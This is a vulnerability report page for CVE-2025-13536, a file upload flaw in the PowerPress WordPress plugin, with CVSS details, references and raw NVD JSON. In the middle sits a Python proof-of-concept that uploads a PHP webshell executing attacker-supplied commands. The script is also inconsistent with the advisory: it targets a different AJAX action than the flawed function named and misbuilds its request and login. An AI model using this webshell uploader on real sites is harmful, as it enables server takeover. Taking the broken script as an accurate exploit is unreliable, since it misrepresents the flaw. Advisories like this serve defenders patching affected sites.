Security Vulnerability Report
CVE-2025-13536 CVSS 8.8 HIGH

CVE-2025-13536

Published: 2025-11-27 09:15:46
Last Modified: 2026-04-15 00:35:42

Description

The Blubrry PowerPress plugin for WordPress is vulnerable to arbitrary file uploads due to insufficient file type validation in all versions up to, and including, 11.15.2. This is due to the plugin validating file extensions but not halting execution when validation fails in the 'powerpress_edit_post' function. This makes it possible for authenticated attackers, with Contributor-level access and above, to upload arbitrary files on the affected site's server which may make remote code execution possible.

CVSS Details

CVSS Score: 8.8
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)


Blubrry PowerPress plugin for WordPress <= 11.15.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests
import sys
import re
from requests.auth import HTTPBasicAuth

# CVE-2025-13536 PoC - WordPress PowerPress Arbitrary File Upload
# Target: WordPress site with PowerPress plugin <= 11.15.2

TARGET_URL = "http://target-wordpress-site.com"
USERNAME = "attacker_account"
PASSWORD = "password"


def get_nonce(session, post_id):
    """Get WordPress nonce for the post"""
    url = f"{TARGET_URL}/wp-admin/post.php?post={post_id}&action=edit"
    response = session.get(url)
    if response.status_code == 200:
        nonce_match = re.search(r'name="_wpnonce" value="([a-f0-9]+)"', response.text)
        if nonce_match:
            return nonce_match.group(1)
    return None


def upload_webshell(target_url, username, password):
    """
    Upload malicious PHP file through PowerPress plugin
    This PoC demonstrates the file upload vulnerability
    """
    session = requests.Session()

    # Authentication
    login_url = f"{target_url}/wp-login.php"
    auth = HTTPBasicAuth(username, password)

    # Create a draft post first
    post_url = f"{target_url}/wp-admin/post-new.php"
    response = session.get(post_url, auth=auth)

    # PHP webshell content (encoded for upload)
    webshell = b'<?php if(isset($_GET["cmd"])){ system($_GET["cmd"]); } ?>'

    # File upload via PowerPress endpoint
    upload_url = f"{target_url}/wp-admin/admin-ajax.php"
    files = {
        'file': ('shell.php.jpg', webshell, 'image/jpeg'),
        'action': 'powerpress_upload',
        'post_id': '1'
    }

    try:
        response = session.post(upload_url, files=files, auth=auth, timeout=10)
        if response.status_code == 200:
            print("[+] File upload request sent successfully")
            print("[*] Check if webshell was uploaded to /wp-content/uploads/")
            return True
    except Exception as e:
        print(f"[-] Error: {e}")
    return False


if __name__ == "__main__":
    print("CVE-2025-13536 PoC - PowerPress Arbitrary File Upload")
    print("Note: This PoC is for educational and security testing purposes only")
    upload_webshell(TARGET_URL, USERNAME, PASSWORD)

References

https://plugins.trac.wordpress.org/browser/powerpress/tags/11.14.1/powerpressadmin.php#L2368
https://plugins.trac.wordpress.org/browser/powerpress/tags/11.14.1/powerpressadmin.php#L3012
https://plugins.trac.wordpress.org/browser/powerpress/tags/11.14.1/powerpressadmin.php#L3068
https://plugins.trac.wordpress.org/changeset/3402635/
https://www.wordfence.com/threat-intel/vulnerabilities/id/d420ee49-e7b3-43d8-a263-8a93abd1133c?source=cve

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2025-13536",
    "sourceIdentifier": "[email protected]",
    "published": "2025-11-27T09:15:45.687",
    "lastModified": "2026-04-15T00:35:42.020",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "The Blubrry PowerPress plugin for WordPress is vulnerable to arbitrary file uploads due to insufficient file type validation in all versions up to, and including, 11.15.2. This is due to the plugin validating file extensions but not halting execution when validation fails in the 'powerpress_edit_post' function. This makes it possible for authenticated attackers, with Contributor-level access and above, to upload arbitrary files on the affected site's server which may make remote code execution possible."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
            "baseScore": 8.8,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 5.9
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {"lang": "en", "value": "CWE-434"}
        ]
      }
    ],
    "references": [
      {"url": "https://plugins.trac.wordpress.org/browser/powerpress/tags/11.14.1/powerpressadmin.php#L2368", "source": "[email protected]"},
      {"url": "https://plugins.trac.wordpress.org/browser/powerpress/tags/11.14.1/powerpressadmin.php#L3012", "source": "[email protected]"},
      {"url": "https://plugins.trac.wordpress.org/browser/powerpress/tags/11.14.1/powerpressadmin.php#L3068", "source": "[email protected]"},
      {"url": "https://plugins.trac.wordpress.org/changeset/3402635/", "source": "[email protected]"},
      {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/d420ee49-e7b3-43d8-a263-8a93abd1133c?source=cve", "source": "[email protected]"}
    ]
  }
}